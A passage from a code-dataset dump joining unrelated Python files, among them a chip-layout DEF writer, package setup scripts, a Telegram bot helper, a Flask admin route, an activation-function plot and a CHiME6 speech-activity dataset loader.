SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#////////////////////////////////////////////////////////////////////////////////////\nfrom collections import defaultdict\nfrom statistics import median\nfrom math import floor, ceil\n\nnetlistFilePath\t\t\t\t= 'netlist.txt' \nplacementFilePath \t\t\t= 'locations.txt' \noriginalPlacementFilePath \t= 'cell_locs.txt' \ndefFile \t\t\t\t\t= 'place.def'\n\nmapping \t= defaultdict(list)\nnets \t\t= defaultdict(list)\nplacement \t= defaultdict(list)\n\n#------------------------------------------------------------------------------\n# Read netlist from\ndef readNetlistFile():\n\twith open(netlistFilePath) as fp:\n\t\tfor line in fp:\n\t\t\tterms = line.rstrip(\"\\n\").split(' ')\n\t\t\tif terms[0] is \"B\":\n\t\t\t\tfor i in range(2, len(terms)):\n\t\t\t\t\tnets[terms[1]].append([terms[i].rstrip(\"/_CK_PIN_\"), \"_CK_PIN_\"])\n\t\t\telse:\n\t\t\t\tnode \t= \"ck_\" + terms[0]\n\t\t\t\tlibCell\t= terms[1]\n\t\t\t\tinNet \t= terms[2]\n\t\t\t\toutNet\t= terms[3]\n\t\t\t\tnets[inNet].append([node, \"A\"])\n\t\t\t\tnets[outNet].append([node, \"_BUFF_OUT_PIN_\"])\n\t\t\t\tmapping[node] = libCell\n\t\tnets[\"_CK_PORT_\"].append([\"PIN\", \"_CK_PORT_\"])\t\t\n\n#------------------------------------------------------------------------------\n# Read placement from locations file (CT file)\ndef readPlacementFile():\n\twith open(placementFilePath) as fp:\n\t\tfor line in fp:\n\t\t\tterms = line.rstrip(\"\\n\").split(' ')\n\t\t\tplacement[\"ck_\" + terms[0]].append(terms[1])\n\t\t\tplacement[\"ck_\" + terms[0]].append(terms[2])\n\n#------------------------------------------------------------------------------\n\n# Read placement from locations file (Original placement)\ndef readOriginalPlacementFile():\n\twith open(originalPlacementFilePath) as fp:\n\t\tfor line in fp:\n\t\t\tterms = line.rstrip(\"\\n\").split(' ')\n\t\t\tplacement[terms[0]].append(terms[1])\n\t\t\tplacement[terms[0]].append(terms[2])\n\n#------------------------------------------------------------------------------\n# Append clock components \ndef writeComponents():\n\tfor node, libCell in mapping.items():\n\t\tx = int(float(placement[node][0]) * 1000)\n\t\ty = int(float(placement[node][1]) * 1000)\n\t\tprint(\" - \" + node + \" \" + libCell + \" + PLACED ( \" + str(x) + \" \" + str(y) + \" ) N\\n;\")\n\n#------------------------------------------------------------------------------\ndef writeNets():\n\tfor net, components in nets.items():\n\t\tprint(\"- \" + net)\t\n\t\tfor node, pin in components:\n\t\t\tprint(\"( \" + node + \" \" + pin + \" )\")\n\t\tprint(\";\")\n\t\n#------------------------------------------------------------------------------\n\ndef writeGuides():\n\tf = open(\"g.guides\", \"w\")\n\n\tgcellw = 5*1360\n\tgcellh = 5*1000\n\ttolx = 1500\n\ttoly = 1200\n\tfor net, components in nets.items():\n\t\txlocs = []\n\t\tylocs = []\n\t\tfor node, pin in components:\n\t\t\txlocs.append(float(placement[node][0])*1000)\t\n\t\t\tylocs.append(float(placement[node][1])*1000)\n\t\txmax = max(xlocs)\n\t\txmin = min(xlocs)\n\t\tymax = max(ylocs)\n\t\tymin = min(ylocs)\n\t\t\t\n\t\tf.write(net + \"\\n\")\n\t\tf.write(\"(\\n\")\n\n\t\tguidesm1 = \"\"\n\t\tguidesm2 = \"\"\n\t\tguidesm3 = \"\"\n\t\tguidesm4 = \"\"\n\t\tif xmax-xmin > ymax-ymin: #trunk horizontal\n\t\t\tycoord = median(ylocs)\n\t\t\t\n\t\t\t# build trunk...\n\t\t\tygrid \t\t= floor(ycoord/gcellh)\n\t\t\txgridmin\t= floor(xmin/gcellw)\t\n\t\t\txgridmax\t= floor(xmax/gcellw)\n\t\t\t\n\t\t\tguide = str((xgridmin-1)*gcellw) + \" \" + str((ygrid-1)*gcellh) + \" \" + str((xgridmax+2)*gcellw) + \" \" + str((ygrid+2)*gcellh)\n\t\t\tguidesm1 = guidesm1 + guide + \" M1\\n\"\n\t\t\tguidesm2 = guidesm2 + guide + \" M2\\n\"\n\t\t\tguidesm3 = guidesm3 + guide + \" M3\\n\"\n\t\t\tguidesm4 = guidesm4 + guide + \" M4\\n\"\n\n\t\t\t# build stems...\n\t\t\tfor i in range(0, len(xlocs)):\n\t\t\t\txgrid = floor(xlocs[i]/gcellw)\n\t\t\t\tygridmin = min(ygrid, floor(ylocs[i]/gcellh))\n\t\t\t\tygridmax = max(ygrid, floor(ylocs[i]/gcellh))\t\n\t\t\t\t\n\t\t\t\tguide = str((xgrid-1)*gcellw) + \" \" + str((ygridmin-1)*gcellh) + \" \" + str((xgrid+2)*gcellw) + \" \" + str((ygridmax+2)*gcellh)\n\t\t\t\tguidesm1 = guidesm1 + guide + \" M1\\n\"\n\t\t\t\tguidesm2 = guidesm2 + guide + \" M2\\n\"\n\t\t\t\tguidesm3 = guidesm3 + guide + \" M3\\n\"\n\t\t\t\tguidesm4 = guidesm4 + guide + \" M4\\n\"\n\t\telse: # trunk vertical\n\t\t\txcoord = median(xlocs)\n\t\t\t\n\t\t\t# build trunk...\n\t\t\txgrid \t\t= floor(xcoord/gcellw)\n\t\t\tygridmin\t= floor(ymin/gcellh)\t\n\t\t\tygridmax\t= floor(ymax/gcellh)\n\t\t\t\n\t\t\tguide = str((xgrid-1)*gcellw) + \" \" + str((ygridmin-1)*gcellh) + \" \" + str((xgrid+2)*gcellw) + \" \" + str((ygridmax+2)*gcellh);\n\t\t\tguidesm1 = guidesm1 + guide + \" M1\\n\"\n\t\t\tguidesm2 = guidesm2 + guide + \" M2\\n\"\n\t\t\tguidesm3 = guidesm3 + guide + \" M3\\n\"\n\t\t\tguidesm4 = guidesm4 + guide + \" M4\\n\"\n\n\t\t\t# build stems...\n\t\t\tfor i in range(0, len(xlocs)):\n\t\t\t\tygrid = floor(ylocs[i]/gcellh)\n\t\t\t\txgridmin = min(xgrid, floor(xlocs[i]/gcellw))\n\t\t\t\txgridmax = max(xgrid, floor(xlocs[i]/gcellw))\t\n\t\t\t\tguide = str((xgridmin-1)*gcellw) + \" \" + str((ygrid-1)*gcellh - toly) + \" \" + str((xgridmax+2)*gcellw + tolx) + \" \" + str((ygrid+2)*gcellh)\n\t\t\t\tguidesm1 = guidesm1 + guide + \" M1\\n\"\n\t\t\t\tguidesm2 = guidesm2 + guide + \" M2\\n\"\n\t\t\t\tguidesm3 = guidesm3 + guide + \" M3\\n\"\n\t\t\t\tguidesm4 = guidesm4 + guide + \" M4\\n\"\n\n\t\tf.write(guidesm1);\n\t\tf.write(guidesm2);\n\t\tf.write(guidesm3);\n\t\tf.write(guidesm4);\n\t\tf.write(\")\\n\")\n\tf.close()\n#------------------------------------------------------------------------------\n\n### main\nreadNetlistFile()\nreadPlacementFile()\n\nwith open(defFile) as fp:\n\t\tfor line in fp:\n\t\t\tline = line.rstrip(\"\\n\")\n\t\t\tterms = line.split(\" \")\n\t\t\tif \"COMPONENTS\" in line and \"END\" not in line:\n\t\t\t\tterms = line.split(\" \")\n\t\t\t\tnumComponents = int(terms[1]) + len(mapping)\n\t\t\t\tprint(\"COMPONENTS \" + str(numComponents) + \" ;\")\n\t\t\t\twriteComponents()\n\t\t\telif \"NETS\" in line and \"END\" not in line and \"SPECIAL\" not in line: \n\t\t\t\tterms = line.split(\" \")\n\t\t\t\tnumNets = int(terms[1]) + len(nets) - 1\n\t\t\t\tprint(\"NETS \" + str(numNets) + \" ;\")\n\t\t\t\twriteNets()\n\t\t\telif \"- _CK_PORT_\" in line and not \"NET\" in line: # Skip the original clock net\n\t\t\t\twhile \";\" not in line:\n\t\t\t\t\tline = fp.readline()\n\t\t\telse: \n\t\t\t\tprint(line)\n\n#readOriginalPlacementFile()\n#writeGuides()\n","sub_path":"src/scripts/update_def.py","file_name":"update_def.py","file_ext":"py","file_size_in_byte":7773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"521228321","text":"import os\nimport sys\nimport subprocess\nfrom setuptools import setup, find_packages\n\nhere = os.path.abspath(os.path.dirname(__file__))\nREADME = open(os.path.join(here, 'README.txt')).read()\nCHANGES = open(os.path.join(here, 'CHANGES.txt')).read()\n\nrequires=['pyramid>=1.5a2',\n 'SQLAlchemy',\n 'transaction',\n 'pyramid_tm',\n 'pyramid_debugtoolbar',\n 'zope.sqlalchemy', \n 'waitress',\n 'ziggurat-foundations',\n 'colander',\n 'deform>=2.0a2',\n 'pyramid_chameleon',\n 'psycopg2',\n 'alembic>=0.3.4',\n 'pyramid_beaker',\n 'pytz',\n 'xlrd',\n 'sqlalchemy-datatables',\n 'pyjasper',\n 'requests',\n 'pyramid_rpc',\n 'paste',\n 'pyramid_translogger',\n ]\n\nif sys.argv[1:] and sys.argv[1] == 'develop-use-pip':\n bin_ = os.path.split(sys.executable)[0]\n pip = os.path.join(bin_, 'pip')\n for package in requires:\n cmd = [pip, 'install', package]\n subprocess.call(cmd)\n cmd = [sys.executable, sys.argv[0], 'develop']\n subprocess.call(cmd)\n sys.exit()\n\nsetup(name='osipkd',\n version='0.0',\n description='osipkd',\n long_description=README + '\\n\\n' + CHANGES,\n classifiers=[\n \"Programming Language :: Python\",\n \"Framework :: Pylons\",\n \"Topic :: Internet :: WWW/HTTP\",\n \"Topic :: Internet :: WWW/HTTP :: WSGI :: Application\",\n ],\n author='',\n author_email='',\n url='',\n keywords='web pyramid pylons',\n packages=find_packages(),\n include_package_data=True,\n zip_safe=False,\n install_requires=requires,\n tests_require=requires,\n test_suite=\"osipkd\",\n entry_points = \"\"\"\\\n [paste.app_factory]\n main = osipkd:main\n [console_scripts]\n initialize_osipkd_db = osipkd.scripts.initializedb:main \n \"\"\",\n )\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"33384867","text":"from config import client, MONGO_BD_NAME\n\nKIND_SMILE = '😊'\nSAD_SMILE = '☹'\n\n\ndef get_weather_advice(temp):\n if temp <= -15:\n answer = 'Очень холодно.'\n elif temp > -15 and temp <= 5:\n answer = 'Довольно прохладно.'\n elif temp > 5 and temp <= 24:\n answer = 'Вполне благоприятная температура.'\n else:\n answer = 'Очень жарко.'\n\n return answer\n\n\ndb = client.tg_bot\ndoings_collection = db['doings']\nrates_collection = db['rates']\n\n\ndef insert_into_db(collection, data):\n collection.insert_one(data)\n\n\ndef get_many_from_db(collection, data):\n return collection.find(data)\n\n\ndef get_one_from_db(collection, data):\n return collection.find_one(data)\n\n\nhelp_text = '''\nСписок доступных команд:\n/weather - погода\n/doings - добавление и просмотр дел\n/creator - инфо о разработчике\n/rate - оценка\n'''\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"631911743","text":"def isIn(char, aStr):\n '''\n char: a single character\n aStr: an alphabetized string\n\n returns: True if char is in aStr; False otherwise\n '''\n if not aStr:\n return False\n\n mid_index = int(len(aStr)/2)\n mid_char = aStr[mid_index]\n\n if char == aStr:\n return True\n elif mid_char == char:\n return True\n elif len(aStr) == 1:\n return False\n elif char < mid_char:\n return isIn(char, aStr[:mid_index])\n else:\n return isIn(char, aStr[mid_index+1:])\n\n #Some ideas: Perhaps need to break problem into even/odd len strings, so that mid_char can be calculated/rounded consistently... \n","sub_path":"isIn.py","file_name":"isIn.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"609471429","text":"from torch.utils.data import Dataset\nfrom parsing.parse_chime6 import parse_chime6, get_session\nimport glob\nimport os\nfrom pathlib import Path\nimport soundfile as sf\nimport numpy as np\nimport torch\nfrom SSAD.utils.oladd import _gen_frame_indices\nimport random\nfrom pysndfx import AudioEffectsChain\n\nclass OnlineFeats(Dataset):\n\n def __init__(self, chime6_root, split, label_root, configs, segment=300, probs=None):\n\n self.configs = configs\n self.segment = segment\n self.probs = probs\n meta = parse_chime6(chime6_root, split)\n\n labels = glob.glob(os.path.join(label_root, \"*.wav\"))\n lab_hash = {}\n\n for l in labels:\n l_sess = str(Path(l).stem).split(\"-\")[-1]\n lab_hash[l_sess] = l\n\n new = {}\n for k in meta.keys():\n if k not in lab_hash.keys():\n print(\"removing key... this better be the validation set\")\n continue\n new[k] = meta[k]\n meta = new\n\n\n devices = []\n devices_hash = {}\n for sess in meta.keys():\n devices_hash[sess] = []\n #devices.extend(meta[sess][\"binaurals\"])\n for array in meta[sess][\"arrays\"].keys():\n devices.extend(meta[sess][\"arrays\"][array])\n devices_hash[sess].extend(meta[sess][\"arrays\"][array])\n\n self.devices = devices\n self.devices_hash = devices_hash # used for data augmentation\n\n\n #assert len(set(list(meta.keys())).difference(set(list(lab_hash.keys())))) == 0\n # remove keys\n\n\n self.label_hash = lab_hash\n\n if self.probs: # parse for data-augmentation\n label_one = []\n label_two = []\n\n for l in labels:\n c_label, _ = sf.read(l) # read it all\n sess = Path(l).stem.split(\"-\")[-1]\n # find contiguous\n tmp = self.get_segs(c_label, 1, 1)\n for s,e in tmp:\n assert not np.where(c_label[s:e] > 1)[0].any()\n tmp = [(sess, x[0], x[1]) for x in tmp] # we need session also\n label_one.extend(tmp)\n\n # do the same for two speakers\n tmp = self.get_segs(c_label, 2, 2)\n for s, e in tmp:\n assert not np.where(c_label[s:e] != 2)[0].any()\n tmp = [(sess, x[0], x[1]) for x in tmp]\n label_two.extend(tmp)\n\n self.label_one = label_one\n self.label_two = label_two\n\n self.tot_length = int(np.sum([len(sf.SoundFile(l)) for l in labels]) / segment)\n\n self.set_feats_func()\n\n\n def get_segs(self, label_vector, min_speakers, max_speakers):\n\n segs = []\n label_vector = np.logical_and(label_vector <= max_speakers, label_vector >= min_speakers)\n changePoints = np.where((label_vector[:-1] != label_vector[1:]) == True)[0]\n changePoints = np.concatenate((np.array(0).reshape(1, ), changePoints))\n if label_vector[0] == 1:\n start = 0\n else:\n start = 1\n for i in range(start, len(changePoints) - 1, 2):\n if (changePoints[i + 1] - changePoints[i]) > 30: # if only more than 30 frames\n segs.append([changePoints[i] +1, changePoints[i + 1]-1])\n\n return segs\n\n\n def set_feats_func(self):\n\n # initialize feats_function\n if self.configs[\"feats\"][\"type\"] == \"mfcc_kaldi\":\n from torchaudio.compliance.kaldi import mfcc\n self.feats_func = lambda x: mfcc(torch.from_numpy(x.astype(\"float32\").reshape(1, -1)), **self.configs[\"mfcc_kaldi\"]).transpose(0, 1)\n elif self.configs[\"feats\"][\"type\"] == \"fbank_kaldi\":\n from torchaudio.compliance.kaldi import fbank\n self.feats_func = lambda x: fbank(torch.from_numpy(x.astype(\"float32\").reshape(1, -1)), **self.configs[\"fbank_kaldi\"]).transpose(0, 1)\n elif self.configs[\"feats\"][\"type\"] == \"spectrogram_kaldi\":\n from torchaudio.compliance.kaldi import spectrogram\n self.feats_func = lambda x: spectrogram(torch.from_numpy(x.astype(\"float32\").reshape(1, -1)),\n **self.configs[\"spectrogram_kaldi\"]).transpose(0, 1)\n else:\n raise NotImplementedError\n\n def __len__(self):\n return self.tot_length\n\n def noaugm(self):\n # no augmentation\n file = np.random.choice(self.devices)\n sess = get_session(file)\n start = np.random.randint(7000,\n len(sf.SoundFile(self.label_hash[sess])) - self.segment - 2) # skip first minute\n stop = start + self.segment\n label, _ = sf.read(self.label_hash[sess], start=start, stop=stop)\n if self.configs[\"task\"] == \"vad\":\n label = label >= 1\n elif self.configs[\"task\"] == \"osd\":\n label = label >= 2\n elif self.configs[\"task\"] == \"vadosd\":\n label = np.clip(label, 0, 2)\n elif self.configs[\"task\"] == \"count\":\n pass\n else:\n raise EnvironmentError\n # get file start\n start = int(start * self.configs[\"data\"][\"fs\"] * self.configs[\"feats\"][\"hop_size\"])\n stop = int(stop * self.configs[\"data\"][\"fs\"] * self.configs[\"feats\"][\"hop_size\"] )#+ \\\n # self.configs[\"data\"][\"fs\"]* self.configs[\"feats\"][\"hop_size\"] * 2)\n\n audio, fs = sf.read(file, start=start, stop=stop)\n\n if len(audio.shape) > 1: # binaural\n audio = audio[:, np.random.randint(0, 1)]\n\n audio = self.feats_func(audio)\n label = label[:audio.shape[-1]]\n return audio, torch.from_numpy(label).long(), torch.ones(len(label)).bool()\n\n @staticmethod\n def normalize(signal, target_dB):\n\n fx = (AudioEffectsChain().custom(\n \"norm {}\".format(target_dB)))\n signal = fx(signal)\n return signal\n\n def __getitem__(self, item):\n\n if not self.probs:\n return self.noaugm()\n else:\n spkrs = np.random.choice([1, 4], p=self.probs)\n\n if spkrs == 1:\n return self.noaugm()\n elif spkrs == 4:\n # sample 2 from labels one\n mix = []\n labels = []\n first_lvl = None\n maxlength = None\n for i in range(spkrs):\n sess, start, stop = random.choice(self.label_one)\n label, _ = sf.read(self.label_hash[sess], start=start, stop=stop)\n\n # get file start\n start = int(start * self.configs[\"data\"][\"fs\"] * self.configs[\"feats\"][\"hop_size\"])\n stop = int(stop * self.configs[\"data\"][\"fs\"] * self.configs[\"feats\"][\"hop_size\"])\n file = np.random.choice(self.devices_hash[sess])\n audio, fs = sf.read(file, start=start, stop=stop)\n if i == 0:\n c_lvl = np.clip(random.normalvariate(*self.configs[\"augmentation\"][\"abs_stats\"]), -40, 1) # allow for clipping in CHiME some devices are clipped\n first_lvl = c_lvl\n audio = self.normalize(audio, c_lvl)\n maxlength = len(audio)\n else:\n c_lvl = np.clip(first_lvl - random.normalvariate(*self.configs[\"augmentation\"][\"rel_stats\"]), first_lvl-10, min(first_lvl+10, 0))\n audio = self.normalize(audio, c_lvl)\n rand_offset = random.randint(0, maxlength // 2)\n # pad only heads\n audio = np.pad(audio, (rand_offset, 0), 'constant')\n label = np.pad(label, (int(rand_offset / (self.configs[\"data\"][\"fs\"] * self.configs[\"feats\"][\"hop_size\"])) , 0), 'constant')\n maxlength = max(len(audio), maxlength)\n\n mix.append(audio)\n labels.append(label)\n\n assert maxlength == max([len(x) for x in mix])\n if maxlength > self.segment*self.configs[\"data\"][\"fs\"] * self.configs[\"feats\"][\"hop_size\"]:\n mix = [x[:int(self.segment*self.configs[\"data\"][\"fs\"] * self.configs[\"feats\"][\"hop_size\"])] for x in mix]\n labels = [x[:self.segment] for x in labels]\n valid = torch.ones(self.segment).bool()\n else:\n valid = torch.ones(self.segment).bool()\n valid[int(maxlength/ (self.configs[\"data\"][\"fs\"] * self.configs[\"feats\"][\"hop_size\"])):] = False\n\n padlen = int(self.segment * self.configs[\"data\"][\"fs\"] * self.configs[\"feats\"][\"hop_size\"])\n mix = [np.pad(x, (0, padlen - len(x)), 'constant') for x in mix]\n mix = np.sum(np.stack(mix), 0)\n mix = np.clip(mix, -1, 1) # clipping audio\n\n padlen = self.segment\n labels = [np.pad(x, (0, padlen - len(x)), 'constant') for x in labels]\n labels = np.sum(np.stack(labels), 0)\n mix = self.feats_func(mix)\n #assert mix.shape[-1] == 298\n #assert mix.shape[-1] == len(labels)\n labels = labels[:mix.shape[-1]]\n if self.configs[\"task\"] == \"vadosd\":\n labels = np.clip(labels, 0, 2)\n valid = valid[:mix.shape[-1]]\n return mix, torch.from_numpy(labels).long(), valid\n\n elif spkrs == 3:\n pass\n # sample 1 from label one and two from label two\n elif spkrs == 4:\n pass\n # sample 2 from label one and two from label two\n\nclass OnlineChunkedFeats(Dataset):\n\n def __init__(self, chime6_root, split, label_root, configs, segment=300):\n\n self.configs = configs\n self.segment = segment\n meta = parse_chime6(chime6_root, split)\n\n devices = {}\n for sess in meta.keys():\n devices[sess] = []\n for array in meta[sess][\"arrays\"].keys():\n devices[sess].extend(meta[sess][\"arrays\"][array]) # only channel 1\n\n labels = glob.glob(os.path.join(label_root, \"*.wav\"))\n lab_hash = {}\n\n for l in labels:\n l_sess = str(Path(l).stem).split(\"-\")[-1]\n lab_hash[l_sess] = l\n\n self.lab_hash = lab_hash\n chunks = self.get_chunks(labels)\n\n\n examples = []\n for sess in chunks.keys():\n for s, e in chunks[sess]:\n for dev in devices[sess]:\n examples.append((dev, s, e))\n\n self.examples = examples\n\n self.set_feats_func()\n\n def set_feats_func(self):\n\n # initialize feats_function\n if self.configs[\"feats\"][\"type\"] == \"mfcc_kaldi\":\n from torchaudio.compliance.kaldi import mfcc\n self.feats_func = lambda x: mfcc(torch.from_numpy(x.astype(\"float32\").reshape(1, -1)),\n **self.configs[\"mfcc_kaldi\"]).transpose(0, 1)\n elif self.configs[\"feats\"][\"type\"] == \"fbank_kaldi\":\n from torchaudio.compliance.kaldi import fbank\n self.feats_func = lambda x: fbank(torch.from_numpy(x.astype(\"float32\").reshape(1, -1)),\n **self.configs[\"fbank_kaldi\"]).transpose(0, 1)\n elif self.configs[\"feats\"][\"type\"] == \"spectrogram_kaldi\":\n from torchaudio.compliance.kaldi import spectrogram\n self.feats_func = lambda x: spectrogram(torch.from_numpy(x.astype(\"float32\").reshape(1, -1)),\n **self.configs[\"spectrogram_kaldi\"]).transpose(0, 1)\n else:\n raise NotImplementedError\n\n def get_chunks(self, labels):\n\n chunks = {}\n chunk_size = self.configs[\"data\"][\"segment\"]\n frame_shift = self.configs[\"data\"][\"segment\"]\n\n for l in labels:\n sess = Path(l).stem.split(\"-\")[-1]\n chunks[sess] = []\n # generate chunks for this file\n c_length = len(sf.SoundFile(l)) # get the length of the session files in samples\n for st, ed in _gen_frame_indices(\n c_length, chunk_size, frame_shift, use_last_samples=False):\n if st < 7000: # exclude first minute which contains enrollement for each speaker\n continue\n chunks[sess].append([st, ed])\n return chunks\n\n\n def __len__(self):\n return len(self.examples)\n\n def __getitem__(self, item):\n\n device, s, e = self.examples[item]\n sess = get_session(device)\n labelfile = self.lab_hash[sess]\n\n label, _ = sf.read(labelfile, start=s, stop=e)\n if self.configs[\"task\"] == \"vad\":\n label = label >= 1\n elif self.configs[\"task\"] == \"osd\":\n label = label >= 2\n elif self.configs[\"task\"] == \"vadosd\":\n label = np.clip(label, 0, 2)\n elif self.configs[\"task\"] == \"count\":\n pass\n else:\n raise EnvironmentError\n\n start = int(s * self.configs[\"data\"][\"fs\"] * self.configs[\"feats\"][\"hop_size\"])\n stop = int(e * self.configs[\"data\"][\"fs\"] * self.configs[\"feats\"][\"hop_size\"] +\n self.configs[\"data\"][\"fs\"] * self.configs[\"feats\"][\"hop_size\"] * 2)\n\n audio, fs = sf.read(device, start=start, stop=stop)\n\n if len(audio.shape) > 1: # binaural\n audio = audio[:, np.random.randint(0, 1)]\n\n audio = self.feats_func(audio)\n assert audio.shape[-1] == len(label)\n return audio, torch.from_numpy(label).long()\n\n\nif __name__ == \"__main__\":\n\n import yaml\n with open(\"/home/sam/Projects/SSAD/egs/CHiME6/conf/train.yml\", \"r\") as f:\n confs = yaml.load(f)\n\n a = OnlineFeats(\"/media/sam/cb915f0e-e440-414c-bb74-df66b311d09d/CHiME6\", \"train\",\n \"/media/sam/cb915f0e-e440-414c-bb74-df66b311d09d/labels/train\", confs, probs=(0.0, 1.0))\n from torch.utils.data import DataLoader\n for i in a:\n print(i)\n\n\n\n\n","sub_path":"egs/CHiME6/local/online_data.py","file_name":"online_data.py","file_ext":"py","file_size_in_byte":14113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"106019852","text":"# Cody Brown\n# named_tuple.py\n# Mon Dec 25 06:57:14 CST 2017\n# *********************************************************\ndef main():\n from collections import namedtuple\n\n Car = namedtuple('Car', 'color mileage')\n Saxophone = namedtuple('Saxophone', 'make model')\n my_car = Car('Red', 3425.6)\n my_sax = Saxophone('Tenor', 'Borgani')\n print(my_car.color, my_car.mileage)\n print(my_sax.make, my_sax.model)\n\n\nif __name__ == \"__main__\": main() # main func call\n","sub_path":"named_tuple.py","file_name":"named_tuple.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"399726868","text":"from common.hats import HatsTest\n\nclass Installation(HatsTest):\n def __init__(self, *args, **kwargs):\n self.software = None\n super(Installation, self).__init__(*args, **kwargs)\n\n def add_software(self, software):\n self.software = software\n\n\nclass Octo2Installation(Installation):\n def run(self):\n self.printLog(\"Software version is changed - [%s]\" % self.software.version)\n self.printLog(\"Target is power off\")\n self.powerOff()\n self.delay(1)\n self.printLog(\"Target is power on\")\n self.powerOn()\n\n self.printLog(\"Waiting system ready for software update\")\n str_arrow_key = \"%c%c%c\\n\" % (chr(0x1b), chr(0x5b), chr(0x42))\n self.waitLog(\"BCM72500010\", -1, str_arrow_key)\n self.waitLog(\"AVS init\", -1, str_arrow_key)\n self.waitLog(\"BOLT\", -1, str_arrow_key)\n self.waitLog(\"ROOT >\", -1, str_arrow_key)\n self.waitLog(\"ROOT >\", -1, \"\\n\")\n self.waitLog(\"ROOT >\", -1, \"\\n\")\n self.waitLog(\"ROOT >\", -1, \"\\n\")\n\n self.waitLog(\"[drv_NVRAM_Write]\", -1)\n self.waitLog(\"[drv_NVRAM_Write]\", -1)\n self.printLog(\"Try update software with %s\" % self.software.version)\n\n self.writeSerial(\"\\n\")\n self.writeSerial(\"autoflash \")\n self.writeSerial(\"-server=%s \" % self.getIpAddr())\n self.writeSerial(\"-release=%s\\n\" % self.software.version)\n # self.writeSerial(\"-release=%s\\n\" % \"0.00.02\")\n\n self.printLog(\"Waiting system updated\")\n # self.waitLog(\"BCM72500010\", -1)\n self.waitLog(\"obama\", -1)\n self.printLog(\"Rebooting is done\")\n self.finish()\n","sub_path":"jobs/installation.py","file_name":"installation.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"86856488","text":"import os\n\nimport setuptools\n\nreadme_path = os.path.join(os.path.dirname(__file__), 'README.md')\nwith open(readme_path, 'r') as fp:\n long_description = fp.read()\n\nsetuptools.setup(\n name=\"tasksch\",\n use_scm_version=True,\n setup_requires=['setuptools_scm'],\n author=\"AP Ljungquist\",\n author_email=\"ap@ljungquist.eu\",\n description=\"A tiny library for easing into some modern asyncio\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/apljungquist/tasksch\",\n packages=setuptools.find_packages('tasksch'),\n install_requires=[],\n classifiers=[\n \"Development Status :: 3 - Alpha\",\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n)\n","sub_path":"pypi_install_script/tasksch-0.0.0.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"443841810","text":"from flask import Blueprint, render_template, jsonify\n\nfrom app.main.models import Feed\n\nadmin = Blueprint('admin', __name__, url_prefix=\"/admin\")\n\n\n@admin.route('/')\ndef home():\n return render_template('admin/index.html')\n\n\n@admin.route('/login')\ndef login():\n render_template('admin/login.html')\n\n\n@admin.route('/api')\ndef api_home():\n all_feeds = Feed.query.all()\n print(all_feeds)\n if all_feeds:\n arr = []\n for obj in all_feeds:\n arr.append(obj.serialize())\n print(arr)\n return jsonify(arr)\n return \"haha\"\n","sub_path":"app/admin/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"406332639","text":"import os\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\nIMG_PATH = os.path.dirname(os.path.abspath(__file__))\n\n\ndef plot_function(\n input_signal: np.ndarray,\n output_signal: np.ndarray,\n name: str = None\n) -> None:\n plt.step(input_signal, output_signal)\n plt.xlabel('a')\n plt.ylabel('f(a)')\n plt.xlim(np.min(input_signal) - 0.2, np.max(input_signal) + 0.2)\n plt.ylim(np.min(output_signal) - 0.2, np.max(output_signal) + 0.2)\n if name:\n plt.title(f\"Activation function: {name}\")\n plt.show()\n\n\nif __name__ == \"__main__\":\n input_signal = np.linspace(start=-10, stop=10, num=1000)\n\n # Step function\n # f(a) = 0, if a <= 0 else 1\n output_signal = [0 if a <= 0 else 1 for a in input_signal]\n plot_function(input_signal, output_signal, name='step')\n\n # Tanh\n # f(a) = tanh(a) = 2 / (1+e^(-2a)) - 1\n output_signal = [2 / (1 + np.exp(-2 * a)) - 1 for a in input_signal]\n plot_function(input_signal, output_signal, name='tanh')\n\n # SIGMOID\n # sigmoid(a) = 1 / (1 + e^-a)\n output_signal = [1 / (1 + np.exp(-a)) for a in input_signal]\n plot_function(input_signal, output_signal, name='sigmoid')\n\n # RELU = Rectified Linear Unit\n # f(a) = max (0, a)\n output_signal = [max(0, a) for a in input_signal]\n plot_function(input_signal, output_signal, name='relu')\n","sub_path":"01_Tutorials/Udemy Kurs Deep Learning/Chapter4_NN/Chapter4_2_DeepNeuralNetworks/activationsFunctions.py","file_name":"activationsFunctions.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"143662253","text":"import random\n\nimport torch.utils.data\nfrom torch import nn\nfrom torch import optim\nfrom torch.backends import cudnn\nfrom torchvision import transforms\n\nfrom dataset import data_set\nfrom model import generate_model\nfrom opts import parse_opts\nfrom show_answer import show_answer_epoch\nfrom target_transforms import ClassLabel\n\n\ndef worker_init_fn(worker_id: int):\n random.seed(worker_id)\n\n\n# コマンドラインオプションを取得\nopt = parse_opts()\n\ndevice = torch.device('cpu' if opt.no_cuda else 'cuda')\n\n# チャンネル数を取得\nopt.n_channel = 3\nif opt.add_gray_image_paths:\n opt.n_channel += len(opt.add_gray_image_paths)\nif 